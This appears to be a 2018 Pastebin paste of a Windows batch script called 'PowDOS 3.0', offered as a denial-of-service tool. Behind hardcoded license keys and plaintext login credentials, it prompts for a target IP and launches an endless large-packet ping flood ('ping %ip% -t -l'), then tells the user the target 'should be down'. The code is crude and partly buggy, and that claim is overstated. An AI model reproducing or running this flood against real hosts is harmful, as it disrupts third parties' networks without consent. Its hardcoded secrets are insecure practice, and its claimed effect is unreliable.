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a guest
Dec 15th, 2018
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  1. echo PowDOS 3.0 by James Dale and Cormac O Reilly
  2. @echo off
  3. for /f "delims=" %%x in (config.txt) do (set "%%x")
  4. title PowDOS licensed to: %to%
  5. color 6
  6. cls
  7. cls
  8. :A
  9. echo Welcome to PowDOS. [GOLD PLATED EDITION]
  10. echo the license key entered is: %licensekey%
  11. echo PowDOS will now attempt to read license key
  12. pause
  13. if %licensekey%==84573-34574-45734-34573 goto Z
  14. if %licensekey%==47284-27418-38174-17418 goto Z
  15. if %licensekey%==45743-34543-78676-23456 goto Z
  16. if %licensekey%==54674=23748-56873-58673 goto Z
  17. if %licensekey%==45892-58934-34592-39985 goto Z
  18. if %licensekey%==DEV-KEY-1-22-333-4444-55555 goto R
  19. cls
  20. echo Invalid license key!!! PowDOS will close!!!
  21. pause
  22. exit
  23. cls
  24. :Z
  25. cls
  26. echo Made by Jamz and Cormac - Please Login!
  27. set /p u=Username:
  28. set /p p=Password:
  29. if %u%==cormac if %p%==lol123 goto B
  30. if %u%==jamz if %p%==password goto B
  31. cls
  32. echo Invalid username or password!
  33. pause
  34. goto Z
  35. pause
  36. cls
  37. goto A
  38. :B
  39. cls
  40. echo You are now logged in.
  41. :C
  42. cls
  43. echo You cannot Attack our sites! Naughty Boy!
  44. :F
  45. cls
  46. echo please enter the IP you wish to DOS
  47. set /p ip=
  48. if %ip%==localhost goto T
  49. if %ip%== goto T
  50. if %ip%== goto C
  51. echo IP set. Please enter the amount of bytes you wish to send. (The more the better and more powerfull. The more the longer too)
  52. echo Maxium Range is from 0-65500
  53. set /p time=
  54. echo PowDOS will now attempt to DOS %ip% with %time% bytes this may take a while.
  55. ping %ip% -t -l %time%
  56. echo PowDOS session finished. %ip% should be down if there are no errors displayed above.
  57. pause
  58. cls
  59. set /p another=make another DOS(yes or no)?
  60. if %another%==yes goto B
  61. if %another%==y goto B
  62. pause
  63. exit
  64. :T
  65. echo why would you want to ddos yourself?
  66. pause
  67. goto F
  68. :R
  69. cls
  70. echo Welcome to developer panel
  71. set /p goback=Would you like to continue in normal mode? type yes or no
  72. if %goback%==yes goto Z
  73. if %goback%==y goto Z
  74. cls
  75. echo This is the developer panel, here are the stats:
  76. echo current version: Version 3, Release 3.1.2
  77. echo current ip: %ip%%
  78. echo current bytes: %time%
  79. echo current license key: %licensekey%
  80. echo current username and password: origin:lol123
  81. pause
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